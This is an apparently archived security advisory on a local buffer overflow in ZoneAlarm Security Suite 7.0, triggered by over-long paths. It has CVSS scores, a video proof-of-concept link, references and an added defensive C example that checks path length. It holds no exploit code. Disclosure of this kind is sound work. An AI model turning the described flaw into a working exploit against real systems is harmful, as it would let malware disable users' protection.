ZoneAlarm Security Suite buffer overflow

2008.09.11
Credit: jplopezy
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)
------------------------------------------------------
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
------------------------------------------------------
Description

ZoneAlarm is a well-known firewall; the "Security Suite" version also includes tools such as antivirus, antispam and so on.

Details of the version:

ZoneAlarm Security Suite versión:7.0.483.000
Versión de TrueVector:7.0.483.000
Versión del controlador:7.0.483.000
Versión de motor anti-virus:3
Versión de motor antivirus:5.0.1.85
Versión de archivo DAT de firma de anti-virus 915051681
Versión de motor de protección contra programas espía:5.0.189.0
Versión de archivo DAT de firma de protección contra programas espía 01.200801.3195
Versión de AntiSpam 5.0.6.8903
------------------------------------------------------
Vulnerability

The vulnerability occurs because the program cannot handle very long paths when it analyzes them. This causes a buffer overflow with the possibility of code execution. Malware could exploit the flaw, for instance, to leave the system without protection.
------------------------------------------------------
POC/EXPLOIT

Here you can view a video proof of concept:
http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf
------------------------------------------------------
Juan Pablo Lopez Yacubian
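
The failure mode described under Vulnerability, a path that outgrows a fixed-size buffer, shown from the defensive side as an added C example (not ZoneAlarm's code, which the advisory does not show): a scanner-style path join that reports over-long paths instead of writing past the buffer. The 260-byte limit, the function names and the sample directory names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SCAN_PATH_MAX 260   /* assumed buffer size (Windows MAX_PATH) */

enum join_status { JOIN_OK = 0, JOIN_TOO_LONG = -1, JOIN_BAD_ARG = -2 };

/* Write "dir\name" into out[outsz]. Never writes past the buffer; an
 * over-long result is reported to the caller, not silently truncated. */
static enum join_status join_path(char *out, size_t outsz,
                                  const char *dir, const char *name)
{
    int n;
    if (!out || outsz == 0 || !dir || !name)
        return JOIN_BAD_ARG;
    /* snprintf returns the length the full string would have needed. */
    n = snprintf(out, outsz, "%s\\%s", dir, name);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';      /* leave no truncated path behind */
        return JOIN_TOO_LONG;
    }
    return JOIN_OK;
}

/* Walk `depth` nested directories called `name` below `root`, the way a
 * recursive scan builds paths. Returns how many levels fit in the buffer. */
int descend(const char *root, const char *name, int depth)
{
    char cur[SCAN_PATH_MAX], next[SCAN_PATH_MAX];
    int level = 0;
    if (!root || !name || strlen(root) >= sizeof cur)
        return 0;
    strcpy(cur, root);      /* safe: length checked on the line above */
    while (level < depth &&
           join_path(next, sizeof next, cur, name) == JOIN_OK) {
        memcpy(cur, next, strlen(next) + 1);
        level++;
    }
    return level;           /* level < depth: flag the item as not scanned */
}

int main(void)
{
    /* Constructed sample: a directory of A's nested 100 deep. */
    int fit = descend("C:", "AAAAAAAAAAAAAAAAAAA", 100);
    printf("levels joined before the limit: %d of 100\n", fit);
    return 0;
}
```

A return value lower than the requested depth is the signal to log the item as unscanned and continue, so an over-long path degrades coverage for one item instead of corrupting memory.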

References:

http://xforce.iss.net/xforce/xfdb/45082
http://www.vupen.com/english/advisories/2008/2556
http://www.securitytracker.com/id?1020859
http://www.securityfocus.com/bid/31124
http://www.securityfocus.com/archive/1/archive/1/496226/100/0/threaded
http://secunia.com/advisories/31832
http://osvdb.org/48097


Copyright 2024, cxsecurity.com